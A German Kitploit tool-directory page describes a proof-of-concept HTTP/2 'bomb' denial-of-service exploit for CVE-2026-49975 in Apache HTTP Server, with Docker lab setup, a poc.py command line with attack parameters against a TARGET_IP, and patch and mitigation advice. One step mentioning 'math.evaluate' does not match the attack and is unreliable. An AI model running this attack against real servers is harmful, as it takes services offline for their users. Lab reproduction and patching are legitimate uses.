Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-49975 — Proof-of-Concept-HTTP/2-Bomb-Exploit für CVE-2026-49975, eine Cookie-Header-Speichererschöpfungs-DoS in Apache HTTP Server 2.4.17-2.4.67, mit Docker-Lab und PoC-Skript. | Kitploit
Tools/GitHubGitHub/yym8538/cve-2026-49975
SchwachstellenanalyseExploitationWebsicherheitNetzwerksicherheitRed Teaming
GitHubyym8538/cve-2026-49975

CVE-2026-49975

Proof-of-Concept-HTTP/2-Bomb-Exploit für CVE-2026-49975, eine Cookie-Header-Speichererschöpfungs-DoS in Apache HTTP Server 2.4.17-2.4.67, mit Docker-Lab und PoC-Skript.

Repository anzeigen
1vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-49975 HTTP/2 Bomb

★ CVE-2026-49975 HTTP/2 Bomb PoC ★

https://github.com/user-attachments/assets/89310771-f704-45d1-a6c3-d910de1dbc74


Übersicht

CVE-2026-49975 ist eine Denial-of-Service (DoS)-Schwachstelle in Apache HTTP Server. Die Schwachstelle tritt im HTTP/2-Anfrageverarbeitungspfad auf, wo mehrere cookie-Header-Felder zusammengeführt werden können, ohne ordnungsgemäß gegen LimitRequestFields gezählt zu werden. Durch Senden einer kleinen HPACK-kodierten HTTP/2-Anfrage, die sich in viele cookie-Header-Felder entfaltet, kann ein Angreifer den Server dazu zwingen, während der Cookie-Header-Zusammenführung wiederholt Speicher zu allokieren. Der Angreifer kann dann die HTTP/2-Flusskontrolle nutzen, um die Übertragung der Antwort zu verzögern, wodurch die betroffenen Streams offen gehalten und die Freigabe des allokierten Speichers verhindert wird.


Betroffene Versionen

KategorieVersion
AnfälligApache HTTP Server 2.4.17 ≤ Version ≤ 2.4.67
GepatchtApache HTTP Server 2.4.68 oder später

Auswirkung

  • Remote Denial of Service (DoS)
  • Übermäßiger Speicherverbrauch
  • Verzögerte oder fehlgeschlagene Verarbeitung normaler Benutzeranfragen

Umgebung

Erstellen und starten Sie die anfällige Apache HTTP Server-Umgebung.

root@kitploit:~
docker build -t cve-2026-49975 .
docker run -d --name cve-2026-49975 --memory 8g -p 10081:80 cve-2026-49975

PoC

Nach dem Start der anfälligen Umgebung führen Sie die folgenden Schritte aus, um den Angriff zu reproduzieren.

Schritt 1. Überwachen Sie den Speicherverbrauch des Servers

root@kitploit:~
docker stats cve-2026-49975

Beispielausgabe:

root@kitploit:~
CONTAINER ID   NAME             CPU %   MEM USAGE / LIMIT     MEM %
xxxxxxxxxxxx   cve-2026-49975   0.5%    35.2MiB / 8.0GiB      1.7%

Schritt 2. Führen Sie die HTTP/2 Bomb PoC aus

Senden Sie den folgenden Ausdruck an math.evaluate (z. B. über die Berechnungseingabe der Anwendung).

root@kitploit:~
python3 poc.py \
  --host TARGET_IP \
  --port 10081 \
  --connections 10 \
  --streams 100 \
  --refs 4091 \
  --initial-window 0 \
  --hold 300 \
  --drip-interval 2 \
  --drip-bytes 1

Schritt 3. Bestätigen Sie das Ergebnis

Überprüfen Sie, dass der Speicherverbrauch des Apache-Containers ansteigt und hoch bleibt, während die Angriffs-Streams offen gehalten werden.

Gegenmaßnahmen

  • Aktualisieren Sie Apache HTTP Server auf 2.4.68 oder später
  • Erwägen Sie, HTTP/2 vorübergehend zu deaktivieren, wenn der Dienst es nicht benötigt

Analyse

  • KR: https://www.skshieldus.com/security-insights/reports/eqst-apache-http2-dos-cve-2026-49975
  • EN:
Tool herunterladen